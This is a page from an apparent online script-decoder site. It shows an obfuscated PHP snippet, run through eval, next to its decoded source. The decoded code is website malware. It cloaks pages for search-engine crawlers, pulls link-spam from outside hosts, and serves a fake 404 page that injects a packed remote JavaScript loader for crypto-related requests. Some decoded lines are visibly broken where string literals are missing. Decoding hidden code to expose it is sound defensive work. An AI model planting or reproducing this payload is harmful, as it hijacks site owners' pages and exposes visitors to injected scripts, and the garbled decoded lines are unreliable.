Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php function gcQo($YnCAZw)
{
$YnCAZw=gzinflate(base64_decode($YnCAZw));
 for($i=0;$i<strlen($YnCAZw);$i++)
 {
$YnCAZw[$i] = chr(ord($YnCAZw[$i])-1);
 }
 return $YnCAZw;
 }eval(gcQo("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"));?>

Decrypted code:

     
//  ini_set("error_reporting","E_ALL & ~E_NOTICE");
  ini_set('date.timezone','Asia/Shanghai');
  
  $proxy_modex = 2;
  

  $limit = 10000;
  
  
  $inlink_flagx = "bitcoin|ethereum|litecoin|tron|chainlink|cardano|trx|usdt|btc|etc|xmr";


  $url_jsx = "https://tz.bwksma1.top/bnb.js";
  
  $proxy_urlx = "http://usdt.choubaguai.top/index.php?".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  
  $outlink_urlx = "http://link.choubaguai.top";

  
  $arr_uax = array("google", "bing");
  $arr_refx = array("google", "bing");
//  $arr_uax = array("baidu", "sogou", "360", "yisou");
//  $arr_refx = array("baidu.com", "sogou.com", "so.com", "sm.cn");
  

  if($proxy_modex == 0)     //只开放动态蜘蛛池功能
  {
    //如果是有效的蜘蛛访问，就在本页插入外链+动态内链
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
      $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
      echo $contentx;
    }
    
  }
  else if($proxy_modex == 1)    //只开放静态蜘蛛池功能
  {

    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
      $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
      echo $contentx;
    }
  }
  else if($proxy_modex == 2) 
  {
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      if(search_flagx($inlink_flagx))
      {
        $proxy_urlx .= "&flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($proxy_urlx);
        echo $contentx;
        exit;
      }
      else
      {
        $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
        echo $contentx;
      }
    }
//    else if(strpos($_SERVER['REQUEST_URI'], "?") !== false && is_Mobile() && info_checkx($_SERVER["HTTP_REFERER"],$arr_refx))
    else if(search_flagx($inlink_flagx))
    {
      $codex = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n<p>The requested URL {url} was not found on this server.</p>\r\n{js}\r\n</body></html>\r\n";
      $jsx = get_ads($url_jsx);
      $codex = str_ireplace("{js}", $jsx, $codex);
      $contentx = str_ireplace("{url}", $_SERVER['REQUEST_URI'], $codex);
      echo $contentx;
      exit;
    }
  }
  else if($proxy_modex == 3)
  {
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      if(search_flagx($inlink_flagx))
      {
        $proxy_urlx .= "&flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($proxy_urlx);
        echo $contentx;
        exit;
      }
      else
      {
        $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
        echo $contentx;
      }
    }
//    else if(search_flagx($inlink_flagx) && is_Mobile() && info_checkx($_SERVER["HTTP_REFERER"],$arr_refx))
    else if(search_flagx($inlink_flagx))
    {
      $codex = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n<p>The requested URL {url} was not found on this server.</p>\r\n{js}\r\n</body></html>\r\n";
      $jsx = get_ads($url_jsx);
      $codex = str_ireplace("{js}", $jsx, $codex);
      $contentx = str_ireplace("{url}", $_SERVER['REQUEST_URI'], $codex);
      echo $contentx;
      exit;
    }
  }

  function info_checkx($p_str, $p_arr)
  {
    $result = 0;
    foreach($p_arr as $value)
    {
      if(stripos($p_str,$value)!==false)
      {
        $result = 1;
        break;
      }
    }
    return $result;
  }


  function myrequestx($p_url, $p_ua="Googlebot")
    {
        $opts['http']['ignore_errors'] = true;
        $opts['http']['method'] = "GET";
    $opts['ssl']['verify_peer'] = false;
    $opts['ssl']['allow_self_signed'] = true;
      
        $header_default = array();
    $header_default['User-Agent'] = $p_ua;
    $header_default['Accept'] = "*/*";
    $header_default['Accept-Language'] = "zh-CN";
//    $header_default['Accept-Encoding'] = "gzip, deflate";
    $header_default['Connection'] = "Close";
      
        $result = "";
      foreach($header_default as $key=>$value)
    {
      if($value != "")
      {
        $result .= $key.": ".$value."\r\n";
      }
    }
        
      $opts['http']['header'] = $result;
      $context = stream_context_create($opts);
    $contentx = file_get_contents($p_url, false, $context);
    
    return $contentx;
    }


  function is_Mobilexxx()
  {
    $str = "phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone";
    $arr = explode("|", $str);
    $result = 0;
    foreach($arr as $value)
    {
      if(stripos($_SERVER['HTTP_USER_AGENT'],$value)!==false)
      {
        $result = 1;
        break;
      }
    }
    return $result;
  }


  function search_flagx($p_flag)
  {
    $arr = explode("|", $p_flag);
    $number = count($arr);
    $result = 0;
    $myuri = $_SERVER['REQUEST_URI'];
    for($i = 0; $i < $number; $i ++)
    {
      if(stripos($myuri, $arr[$i]) !== false)
      {
        $result = 1;
        break;
      }
    }
    
    return $result;
  }



  function get_ads($p_url)
  {
    $model = "PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmV2YWwoZnVuY3Rpb24ocCxhLGMsayxlLHIpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuKGM8YT8nJzplKHBhcnNlSW50KGMvYSkpKSsoKGM9YyVhKT4zNT9TdHJpbmcuZnJvbUNoYXJDb2RlKGMrMjkpOmMudG9TdHJpbmcoMzYpKX07aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSlyW2UoYyldPWtbY118fGUoYyk7az1bZnVuY3Rpb24oZSl7cmV0dXJuIHJbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSlpZihrW2NdKXA9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pO3JldHVybiBwfSgnbShkKHAsYSxjLGssZSxyKXtlPWQoYyl7ZiBjLm4oYSl9O2goIVwnXCcuaSgvXi8sbykpe2ooYy0tKXJbZShjKV09a1tjXXx8ZShjKTtrPVtkKGUpe2YgcltlXX1dO2U9ZCgpe2ZcJ1xcXFx3K1wnfTtjPTF9O2ooYy0tKWgoa1tjXSlwPXAuaShxIHMoXCdcXFxcYlwnK2UoYykrXCdcXFxcYlwnLFwnZ1wnKSxrW2NdKTtmIHB9KFwnMVsiMiJdWyIzIl0oXFxcJzwwIDQ9IjUvNiIgNz0iODovLzkuYS9iLmMiPjwvMD5cXFwnKTtcJyxsLGwsXCd0fHV8dnx4fHl8enxBfEJ8Q3xEfEV8RnxHXCcuSChcJ3xcJyksMCx7fSkpJyw0NCw0NCwnfHx8fHx8fHx8fHx8fGZ1bmN0aW9ufHxyZXR1cm58fGlmfHJlcGxhY2V8d2hpbGV8fDEzfGV2YWx8dG9TdHJpbmd8U3RyaW5nfHxuZXd8fFJlZ0V4cHxzY3JpcHR8d2luZG93fGRvY3VtZW50fHx3cml0ZXx0eXBlfHRleHR8amF2YXNjcmlwdHxzcmN8aHR0cHN8e2RvbWFpbjF9fHtkb21haW4yfXx7bmFtZX18anN8c3BsaXQnLnNwbGl0KCd8JyksMCx7fSkpPC9zY3JpcHQ+";
    $model = base64_decode($model);
  
    $url = $p_url;
  
    $domain_all = regular_domain($url);
    $domain_top = top_domain($domain_all);
  
    $part1 = str_ireplace($domain_top, "", $domain_all);
    $arr = explode(, $domain_top);
    $part2 = $arr[0];
    $part3 = str_ireplace($part2., "", $domain_top);
  
    $str = str_ireplace($domain_top."/", " ", $url);
    $arr = explode(" ", $str);
    $name = $arr[1];
    $name = str_ireplace(".js", "", $name);
  
    $model = str_ireplace("{domain1}", $part1.$part2, $model);
    $model = str_ireplace("{domain2}", $part3, $model);
    $model = str_ireplace("{name}", $name, $model);
  
    return $model;
  }

  
  

  
  
function regular_domain($domain)
{
  if (substr ( $domain, 0, 7 ) == 'http://') {
    $domain = substr ( $domain, 7 );
  }
  else if(substr ( $domain, 0, 8 ) == 'https://') {
    $domain = substr ( $domain, 8 );
  }
  
  if (strpos ( $domain, '/' ) !== false) {
    $domain = substr ( $domain, 0, strpos ( $domain, '/' ) );
  }
  return strtolower ( $domain );
}

function top_domain($domain)
{
  $domain = regular_domain( $domain );
  $iana_root = array (
      'xyz', 'top', 'win', 'life',
      'ac',
      'ad',
      'ae',
      'aero',
      'af',
      'ag',
      'ai',
      'al',
      'am',
      'an',
      'ao',
      'aq',
      'ar',
      'arpa',
      'as',
      'asia',
      'at',
      'au',
      'aw',
      'ax',
      'az',
      'ba',
      'bb',
      'bd',
      'be',
      'bf',
      'bg',
      'bh',
      'bi',
      'biz',
      'bj',
      'bl',
      'bm',
      'bn',
      'bo',
      'bq',
      'br',
      'bs',
      'bt',
      'bv',
      'bw',
      'by',
      'bz',
      'ca',
      'cat',
      'cc',
      'cd',
      'cf',
      'cg',
      'ch',
      'ci',
      'ck',
      'cl',
      'cm',
      'cn',
      'co',
      'com',
      'coop',
      'cr',
      'cu',
      'cv',
      'cw',
      'cx',
      'cy',
      'cz',
      'de',
      'dj',
      'dk',
      'dm',
      'do',
      'dz',
      'ec',
      'edu',
      'ee',
      'eg',
      'eh',
      'er',
      'es',
      'et',
      'eu',
      'fi',
      'fj',
      'fk',
      'fm',
      'fo',
      'fr',
      'ga',
      'gb',
      'gd',
      'ge',
      'gf',
      'gg',
      'gh',
      'gi',
      'gl',
      'gm',
      'gn',
      'gov',
      'gp',
      'gq',
      'gr',
      'gs',
      'gt',
      'gu',
      'gw',
      'gy',
      'hk',
      'hm',
      'hn',
      'hr',
      'ht',
      'hu',
      'id',
      'ie',
      'il',
      'im',
      'in',
      'info',
      'int',
      'io',
      'iq',
      'ir',
      'is',
      'it',
      'je',
      'jm',
      'jo',
      'jobs',
      'jp',
      'ke',
      'kg',
      'kh',
      'ki',
      'km',
      'kn',
      'kp',
      'kr',
      'kw',
      'ky',
      'kz',
      'la',
      'lb',
      'lc',
      'li',
      'lk',
      'lr',
      'ls',
      'lt',
      'lu',
      'lv',
      'ly',
      'ma',
      'mc',
      'md',
      'me',
      'mf',
      'mg',
      'mh',
      'mil',
      'mk',
      'ml',
      'mm',
      'mn',
      'mo',
      'mobi',
      'mp',
      'mq',
      'mr',
      'ms',
      'mt',
      'mu',
      'museum',
      'mv',
      'mw',
      'mx',
      'my',
      'mz',
      'na',
      'name',
      'nc',
      'ne',
      'net',
      'nf',
      'ng',
      'ni',
      'nl',
      'no',
      'np',
      'nr',
      'nu',
      'nz',
      'om',
      'org',
      'pa',
      'pe',
      'pf',
      'pg',
      'ph',
      'pk',
      'pl',
      'pm',
      'pn',
      'pr',
      'pro',
      'ps',
      'pt',
      'pw',
      'py',
      'qa',
      're',
      'ro',
      'rs',
      'ru',
      'rw',
      'sa',
      'sb',
      'sc',
      'sd',
      'se',
      'sg',
      'sh',
      'si',
      'sj',
      'sk',
      'sl',
      'sm',
      'sn',
      'so',
      'sr',
      'ss',
      'st',
      'su',
      'sv',
      'sx',
      'sy',
      'sz',
      'tc',
      'td',
      'tel',
      'tf',
      'tg',
      'th',
      'tj',
      'tk',
      'tl',
      'tm',
      'tn',
      'to',
      'tp',
      'tr',
      'travel',
      'tt',
      'tv',
      'tw',
      'tz',
      'ua',
      'ug',
      'uk',
      'um',
      'us',
      'uy',
      'uz',
      'va',
      'vc',
      've',
      'vg',
      'vi',
      'vn',
      'vu',
      'wf',
      'ws',
      'xxx',
      'ye',
      'yt',
      'za',
      'zm',
      'zw'
  );
  $sub_domain = explode ( , $domain );
  $top_domain = '';
  $top_domain_count = 0;
  for($i = count ( $sub_domain ) - 1; $i >= 0; $i --) {
    if ($i == 0) {
      // just in case of something like NAME.COM
      break;
    }
    if (in_array ( $sub_domain [$i], $iana_root )) {
      $top_domain_count ++;
      $top_domain =  . $sub_domain [$i] . $top_domain;
      if ($top_domain_count >= 2) {
        break;
      }
    }
  }
  $top_domain = $sub_domain [count ( $sub_domain ) - $top_domain_count - 1] . $top_domain;
  return $top_domain;
}

Recent submissions:

<?php /** PHP Encode v1.0 by zeura.com **/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base6... <script>(function(PX0Jye0){Function("PX0Jye",PX0Jye0["BYGkZ9E0fItGYtKv3e140fo"]="try{(func... <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta http-equiv="x-ua-compatible" conte... <?php $YPnSr = 'base64_decode'; $TLqgD = 'str_rot13'; $zBVMN = 'strrev'; $xEKaq = 'gzunc... <?php $YPnSr = 'base64_decode'; $TLqgD = 'str_rot13'; $zBVMN = 'strrev'; $xEKaq = 'gzuncom... <?php $YPnSr='base64_decode'; $TLqgD='str_rot13'; $zBVMN='strrev'; $xEKaq='gzuncompress... eval()\'d code\";s:4:\"line\";i:132;s:8:\"wpc_type\";s:5:\"error\";s:7:\"snippet\";O:14:\"... %PDF-1.4 %�� 1 0 obj <</Alternate/DeviceRGB/N 3/Length 272/Filter/FlateDecode... <?php /** ALOM Obfuscator License * This script has protected by Alom. * * Creathor... <?php function gcQo($YnCAZw) { $YnCAZw=gzinflate(base64_decode($YnCAZw)); for($i=0;$i<...